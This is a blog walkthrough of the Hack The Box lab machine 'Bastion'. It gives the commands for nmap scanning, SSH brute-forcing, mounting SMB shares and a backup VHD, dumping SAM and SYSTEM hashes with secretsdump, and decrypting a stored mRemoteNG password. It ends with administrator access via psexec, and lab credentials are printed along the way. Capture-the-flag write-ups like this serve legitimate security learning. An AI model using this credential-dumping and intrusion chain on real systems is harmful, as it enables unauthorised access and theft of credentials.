Eggsec

Recon

nmap scans

Default & All ports

sudo nmap -T4 -Ao nmapA -p- bastion

sudo nmap -sS -sC -Ao nmapD bastion

The two most intriguing ports are:

  • Port 22 is dedicated to Secure Shell (SSH), ensuring secure remote access and command execution with encrypted communication.
  • Ports 139 and 445 are utilized for NetBIOS Session Service and Server Message Block (SMB) protocol, respectively. They facilitate file and printer sharing in Windows networks, enabling efficient communication between devices.
Ports

22 (SSH)
  • sudo nmap – -script=ssh-brute.nse bastion

Using the Nmap tool to perform a brute-force attack on SSH. unfortunately, it yielded no success.

139/445 (SMB)

  • sudo smbclient -L \\\\bastion\\
  • attempting to list (with the “-L” option) the available shares on the remote server

  • sudo smbmap -u ‘DoesNotexist’ -H bastion
  • “smbmap” tool to interact with the Server Message Block (SMB) protocol on a server. in Windows environments, “READ” and “WRITE” refer to the permissions granted to users or groups for accessing and manipulating files and folders within a shared resource.

Interesting finding:

The presence of a “Backup” directory or share on a system is not a default standard in Windows. It’s more likely that someone created this directory for backup purposes or other specific reasons. System administrators or users often create backup directories to store copies of important data, configurations, or system snapshots.

Learning Center

Mounting Shares

create a file for mounting the “Backups” share, designating it to be mounted at “/mnt/smb” for example.

  • sudo mkdir /mnt/smb
sudo mount -t cifs //bastion/Backups /mnt/smb
  • This command is using the mount command with the -t option to specify the file system type, which is “cifs” (Common Internet File System). It is mounting the network share located at “//bastion/Backups” to the local directory “/mnt/smb.”

Partitions
  • cd to L4mpje-PC, then ls -la
  • .vhd (Virtual Hard Drive)

7z

7z has the capability to view .vhd partitions.

  • sudo 7z l 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
  • This appears to be a bootable partition.
  • sudo 7z l 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
  • This is a Windows installation; we can mount this partition.

Mounting .vhd

Let’s create another share for mounting the ‘.vhd partitions‘ located at ‘/mnt/vhd‘. Since it’s a Windows installation, we’ll only be mounting the second partition.

sudo guestmount -a 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd -m /dev/sda1 –ro -v — /mnt/vhd
  • cd Windows/System32/Config
  • cp SAM SYSTEM SECURITY /home/kali/HTB/Windows-Easy/bastion
  • Let’s use secretsdump from the impacket toolkit
  • impacket-secretsdump -sam SAM -system SYSTEM local
  • this command is extracting password hashes and other security-related information from the SAM and SYSTEM registry hives on a local Windows system using Impacket.
  • we’ve got the hashes for Adminstrator and user L4mpje here. Quick tip: if a hash starts with “31d,” it’s likely associated with a blank or null password. On the other hand, L4mpje’s hash seems legit.
crackstation.net

Let’s copy L4mpje’s hashes and run them through CrackStation. You also have the choice to explore other avenues like Hashcat and John the Ripper.

Learning Center

Foot hold

SSH Creds (L4mpje:bureaulampje)

sudo ssh L4mpje@bastion

user flag

L4mpje:bureaulampje

powershell -Command “(Get-Content user.txt).substring(0,16)

extracting a substring that starts at the beginning (index 0) and includes the first 16 characters.

Privesc

Easy Wins
cmdkey /list

  • cmdkey /list” is listing all the stored credentials (usernames and passwords) saved on your Windows system. These credentials are typically used for accessing network resources such as shared folders, servers, or websites

reg query HKLM /f password /t REG_SZ /s
  • reg query HKLM /f password /t REG_SZ /s” is searching the Windows Registry for any keys or entries containing the word “password”.
systeminfo
  • systeminfo” provides detailed information about the system’s hardware, operating system configuration, and software environment. When executed, it displays a wide range of system-related data, including the computer name, OS version, installed updates, processor information, memory (RAM), network configuration, and more. It’s a handy tool for troubleshooting, system administration, and gaining insights into the system’s specifications and setup.
systeminfo | findstr /B /C:”OS Name” /C:”OS Version” /C:”System Type”
  • This extracts and displays only the lines from the output of “systeminfo” that contain the specified strings (“OS Name”, “OS Version”, and “System Type”). This can help you quickly retrieve specific information about the operating system without needing to sift through the entire “systeminfo” output.

*It appears that we have restrictions. we let’s try running automated tools.

Automated Tools

I attempted to transfer the automated tools “powershell.ps1” and WinPeas to the machine, but it seems that the user is restricted from doing so.

Enumerating

Admin vs Backup Admin Creds

net user Administrator
  • Admin last password set was April 19, 2019
sudo cat /mnt/vhd/Windows/System32/Config/
  • This suggests that the “Backup” is an older backup, and the Admin hash has likely been updated since then. This could explain why the Backup Admin hash had a blank password.
  • Last modified: February 16, 2019.
Searching for Unusual Software in Windows

  • Searching for unusual software is a good practice because it helps identify potential security risks and unauthorized software installations.
  • c:/ (let’s start at the root directory of the C drive)
  • We’ve identified mRemoteNG, which isn’t typically found in the default Windows C drive.
    • I was previously using PowerShell; now, let me switch to the user L4mpje.
mRemoteNG

Navigate to “C:\Users\AppData\Roaming\mRemoteNG\config” as this is the location where the passwords are stored. I will provide article where I found this.

  • cd User L4mpje
dir /a & cd AppData
  • dir /a” in Windows is typically “ls -a“. The “ls” command is used to list directory contents, and the “-a” option (or “a” in the case of “dir /a”) shows all files, including hidden files and directories, in the specified directory
  • cd Roaming
  • cd mRemoteNG & save the confCons.xml file to your working dir.
ConfCons.xml

Cat out and analyzing the contents of the confCons.xml file involves searching for the term “password.” During this examination, I identified both a user and a corresponding hash.

  • Password=“aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
  • Be aware that both hashes for L4mpje and Administrator are found here.
mRemoteNG-Decrypt

Root flag

administrator:thXLHM96BeKL0ER2

sudo smbmap -p 445 -H bastion -u administrator -p thXLHM96BeKL0ER2
  • This command is using “smbmap” with elevated privileges to check out a host named “bastion” on port 445. It’s trying to log in as the user “administrator” with the password “thXLHM96BeKL0ER2”. The goal is to explore what’s available on the SMB server
  • If we’re able to read and write to all of the shares, it’s likely because we have administrator privileges. This level of access typically grants us full control over the shared resources on the server.
sudo ssh administrator@bastion

/home/kali/Tools/ImpacketV.0.10/impacket/build/scripts-3.10/psexec.py administrator:’thXLHM96BeKL0ER2’@bastion
  • This command is executing the “psexec.py” script from Impacket. It’s attempting to run the script to execute commands as the administrator user on the target host “bastion” using the provided password “thXLHM96BeKL0ER2”.
flag

Learning Center

Blog at WordPress.com.

Design a site like this with WordPress.com
Get started